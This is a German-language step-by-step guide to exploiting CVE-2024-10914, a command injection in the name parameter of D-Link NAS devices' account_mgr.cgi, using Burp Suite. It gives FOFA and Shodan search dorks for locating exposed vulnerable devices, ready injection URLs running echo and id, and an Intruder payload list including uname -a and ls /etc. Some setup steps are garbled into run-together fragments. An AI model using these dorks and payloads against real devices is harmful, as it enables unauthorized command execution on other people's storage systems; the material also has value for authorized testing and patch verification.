
CVE-2024-10914_Manuelles Testen mit burpsuite
Verwenden Sie den folgenden Such-Dork, um potenziell anfällige D-Link NAS-Geräte zu finden:
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"
SHODAN:
"http.title:D-Link" product:"lighttpd"
Diese Suchzeichenfolge hilft dabei, Geräte zu identifizieren, die die anfällige D-Link DNS ShareCenter-App mit der spezifischen Version des Lighttpd-Servers ausführen, die von der Schwachstelle betroffen ist.
Dieses Leitfaden enthält Schritt-für-Schritt-Anleitungen zum manuellen Testen einer Befehlseinschleusungs-Schwachstelle (CVE-2024-10914) im name-Parameter von D-Link NAS mit Burp Suite. Ziel-URL: http://Target.
127.0.0.1:8080 eingestellt)127.0.0.1 und Port 8080 setzen.http://Target.Den anfälligen Parameter finden: Suchen Sie in der abgefangenen Anfrage den name-Parameter in der URL. Er sollte wie folgt aussehen:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
Einen Testbefehl injizieren: Ändern Sie den name-Parameter, um einen Testbefehl wie echo "test" einzufügen:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
Die geänderte Anfrage senden: Leiten Sie die geänderte Anfrage an den Server weiter.
Antwort prüfen: Suchen Sie in der Antwort nach der Ausgabe des injizierten Befehls. Wenn der Server beispielsweise echo "test" ausgeführt hat, sollten Sie folgendes sehen:
test
Einen schädlichen Befehl injizieren: Wenn der Test erfolgreich ist, versuchen Sie es mit anspruchsvolleren Befehlen, wie zum Beispiel:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
Die Exploit-Anfrage senden: Leiten Sie diese Anfrage an den Server weiter.
Antwort analysieren: Prüfen Sie, ob die Ausgabe des Befehls (z.B. Benutzer-ID-Informationen) in der Antwort vorhanden ist.
Intruder verwenden: Automatisieren Sie Tests mit dem Intruder-Tool von Burp Suite.
name-Parameter als Payload-Position.Beispiel-Payloads:
echo "test"
id
uname -a
ls /etc
Intruder starten: Führen Sie den Intruder-Angriff aus, um automatisch mehrere Payloads zu testen.